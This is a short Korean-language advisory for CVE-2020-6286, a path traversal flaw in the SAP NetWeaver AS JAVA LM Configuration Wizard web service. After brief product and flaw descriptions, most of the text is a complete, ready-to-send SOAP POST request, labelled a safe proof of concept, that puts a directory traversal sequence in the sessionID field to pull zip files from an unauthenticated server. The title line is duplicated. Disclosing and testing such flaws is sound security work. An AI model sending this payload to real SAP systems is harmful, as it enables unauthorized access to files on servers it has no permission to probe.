
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) 디렉토리 트래버설
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) 디렉터리 트래버설
SAP NetWeaver는 SAP의 통합 기술 플랫폼이자 SAP Business Suite 이후 모든 SAP 애플리케이션의 기술적 기반입니다. SAP NetWeaver는 서비스 지향적 애플리케이션 및 통합 플랫폼으로서, SAP 애플리케이션을 위한 개발 및 실행 환경을 제공하며 맞춤형 개발과 다른 애플리케이션 및 시스템과의 통합에도 사용할 수 있습니다. SAP NetWeaver AS JAVA(LM Configuration Wizard) 버전 7.30, 7.31, 7.40, 7.50의 웹 서비스 내 특정 파라미터의 입력 경로 검증이 불충분하여, 인증되지 않은 공격자가 zip 파일을 특정 디렉터리에 다운로드하는 메서드를 악용할 수 있으며, 이로 인해 경로 트래버설(Path Traversal)이 발생합니다.
안전한 개념 증명(PoC)을 위해 다음 요청을 사용할 수 있습니다. 원격 호스트에 zip 파일이 존재하면 111.zip 파일이 다운로드됩니다.
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header />
<soapenv:Body>
<urn:queryProtocol>
<sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>